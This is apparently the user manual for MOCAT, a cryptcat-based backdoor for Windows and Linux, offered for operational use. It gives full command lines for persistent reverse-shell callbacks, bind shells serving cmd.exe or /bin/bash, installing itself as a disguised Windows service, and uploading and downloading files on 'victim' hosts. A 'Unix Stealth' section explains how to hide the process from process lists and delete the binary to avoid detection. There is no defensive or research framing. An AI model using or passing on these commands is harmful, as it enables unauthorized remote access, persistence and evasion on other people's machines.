|
MOCAT
is a cross-platform multi-purpose backdoor. Based originally on cryptcat, and some mods by shadowlair,
we've added a few additional features to the tool.
MOCAT works in client/server mode and has 2 executables, 1 for Windows
and 1 for Linux. In addition to the standard netcat/cryptcat
functionality, mocat also has additional features. In order to work
across various platforms, mocat has implemented a custom transport
using a combination of tinyXML and a custom MoXML library. All
communications are encrypted using the twofish algorithm.
MOCAT
Unix Mode
- The concept of installation
as a service does not apply
to the Unix operating system as it does to Windows. Unix programs are
started many different ways (cron job, rc script etc.), therefore,
mocat does not have a built in
method to install itself as a
persistent service. On the other hand, most Unix boxes are stable
enough that they don't reboot often by themselves. That being said, the
Unix version, if configured in the Listen
mode, will respawn
it's program and continue to listen on the specified port for
connections until reboot. If persistence if desired, a cron job,
rc.script or modification of an existing rc.script can be used.
MOCAT
Specific Features:
- Command
Interpreter - In addition to
using a standard
cmd.exe shell, mocat has a command interpreter that allows the user to
control various custom aspects of the tool. This interpreter is invoked
from a command shell by issuing the *69
command.
- upload/download
- Provides uploading and downloading of files through the mocat command
shell by using the put
(upload) and get
(download) commands
- persistence
- The Windows version has the ability to
install as a permanent service so that the tool will survive reboots.
Installation is invoke by using the -install
command. Removal is accomplished by using the -remove
command.
- Modifiable in the
source code, currently, mocat installs as RPC
Windows Service
- When set to
reverse callback mode, the user can set and
modify the callback times. Callback time is expressed in minutes and is
invoked at install time by using the -c
# command (where # is number of
minutes before attempting to connect). Default callback is 5 minutes.
- Changeable
Settings: All "installed" settings (port,
IP, callback) can be changed via
the mocat interpreter.
- Registry:
Currently, mocat writes it's settings plaintext to the following
registry keys:
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\IconValues
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\IconValues2
(callback time)
- process
manipulation - MOCAT can list
running processes on the host (pdump)
as well as kill a process (kill)
using the PID number.
- logging
- MOCAT has a basic logging feature
implemented that allows output of a session to be captured on the local
user's side of the connection in XML formatted files. This feature is
currently limited to output from the interpreter (*69)
but can be built out later on.
] Mocat Command Interpreter
Command Set
- These commands are
invoked via the *69 command
| Command Arguments |
Decription |
| put
|
upload
a file to target |
| get
|
retrieve
file from target |
| pdump
|
show
target process list |
| kill
|
kill
process |
| hangup
|
quit
interactive shell |
| callback
|
configure
callback properties. Format is callback
[time_minutes] [ip address] [port number] |
| log
|
log
commands locally |
| help
|
show
list of commands |
Command Line Usage
MOCAT
uses standard netcat/crypcat syntax with the exception of "mocat
unique" commands.
| Command
Arguments |
Decription |
| -d
|
detach
from console, background mode |
| -e
prog |
inbound
program to exec |
| -g
gateway |
source-routing
hop point[s], up to 8 |
| -G
num |
source-routing
pointer: 4, 8, 12 |
| -h
|
help
|
| -i
secs |
delay
interval for lines sent, ports scanned |
| -k
key |
secret
key to use for encryption |
| -l
|
listen
mode, for inbound connects |
| -L
|
listen
persistent, re-listen on socket close |
| -n
|
numeric-only
IP addresses, no DNS lookup |
| -o
file |
hex
dump of traffic |
| -p
port |
local
port number |
| -r
|
randomize
local and remote ports |
| -s
addr |
local
source address |
| -t
|
answer
TELNET negotiation |
| -u
|
UDP
mode |
| -v
|
verbose
[use twice to be more verbose] |
| -w
secs |
timeout
for connects and final net reads |
| -z
|
zero-I/O
mode [used for scanning] |
- port numbers can be
individual or ranges: m-n [inclusive]
Service
Installation Usage
MOCAT commands for
installing/removing as a service
| Command
Arguments |
Decription |
| -install
|
Installs
mocat as a persistant service (Windows only) |
| -remove
|
Removes
mocat as a persistant service |
| -c
|
callback
time in minutes <default is 5> |
Operational
Usage
Persistent
Installation Callback Mode - Windows:
- In this
configuration, mocat will be installed for
persistence, will call a remote IP address and provide a command shell.
This is known as a "Reverse Shell Callback". You will need a local
client listening at the remote IP address to receive this connection.
mocat.exe -install -c
<#> -k <key> -e cmd.exe <remote
IP> <remote port>
- Local user will use
the following commands to accept the incoming call:
mocat.exe -k
<key> -l -p <port>
Time
Use Callback Mode - Windows/Unix:
- In this
configuration, mocat will be ran without persistence
(1 time mode), will call a remote IP address and provide a command
shell. Again, you will need a local client listening at the remote IP
address to receive this connection. For unix, you would call mocat
vice mocat.exe.
mocat.exe -k
<key> -e cmd.exe <remote IP> <remote
port>
Mocat
Service Removal - Windows:
- If you want to remove
mocat as a permanent service, issue the following command:
mocat.exe -remove
Persistent
Listen Mode - Windows:
- In this
configuration, mocat will be installed as a service,
will listen and re-listen on a specified port and will provide whoever
connects to this port, a cmd.exe shell. This configuration is useful if
the victim does not have a firewall or if you know that the firewall
allows a specific port through to the victim.
mocat.exe -install -k
<key> -e cmd.exe -L -p <port>
- Local user will use
the following command to connect to the above instance of mocat:
mocat.exe -k
<key> -n -v <IP address>
<port>
Listen
Mode - Unix:
- In this
configuration, mocat will listen on a specified port,
re-spawn that port upon disconnect and will provide whoever connects to
this port a bash shell.
mocat -k
<key> -e /bin/bash -L -p <port>
- Local user will use
the same command syntax listed in the Installation
Listen Mode Windows notes to
connect to the server.
Callback
Mode - Unix:
- In this
configuration, mocat will callback to a specified remote IP
address/port and provide a bash shell.
mocat -k
<key> -e /bin/bash <remote IP>
<port>
- Local user will use
the following command to accept the incoming connection:
mocat
-k <key> -l -p <port>
MOCAT
Unix Stealth
- When running from a
Unix shell, if someone was to run a
process list, they would probably notice something like this which is
the telltale sign of netcat/cryptcat:
- ./mocat
-k password -e /bin/bash -L -p 6666
- To get around this
problem you can do a couple different things.
- 1. Rename the
file to something that looks legit, reset your path and echo the
options into the program:
#>PATH=.
echo -e /bin/bash -L -p 465 | someprocess &
(this will start the program as "someprocess" and the only output in a
process list will be someprocess,
no command options)
- 2. If you are
not
worried about persistence, delete your mocat file. It's running in the
memory and will continue to do so
until a reboot or someone kills the process
Command Interpreter
Usage
Mocat's
unique feature usage such as upload/download and process
manipulation are covered here. All syntax assumes you are currently in
a remote shell
(bash, sh, cmd.exe etc and that you have entered the
mocat interpreter session (*69)
Enter
MOCAT interpreter mode
*69
Upload
a file from your local box to the remote mocat target
- Note: upload/download
paths must be in quotes
put
"e:\your\local\directory\file.exe" "c:\victim\directory\file.exe"
Download
a file from remote mocat target to your local box
get
"c:\remote\directory\file.exe" "c:\my\local\directory\file.exe"
- Unix syntax is the
same, the paths are the only things that change
- Here is an
example of getting a file from a remote linux target to a local windows
box
get
"/usr/local/etc/somefile" "c:\my\local\directory\somefile.txt"
Process
Manipulation
- To list or kill
processes via the mocat interpreter:
- pdump
- kill
<PID>
Callback
Manipulation
- callback
<time> <IP address> <port> (all fields are
required)
Building MOCAT
Building Mocat Linux
1. cp mocat_linux.tar.gz [build dir] to copy mocat linux archive into appropriate build directory.
2. tar -xzvf mocat_linux.tar.gz to extract source files.
3. make all to build mocat.
4. ./mocat [command args] to execute mocat.
make
clean to clean object files and executables in build directory.
Building Mocat Windows
Built with Visual Studio 6.0 c++
1. Build mo_comms library files first. Open mo_comms.dsw, rebuild.
2. Copy mo_comms.lib to mocat_win directory. Open mocat_win.dsp, rebuild
|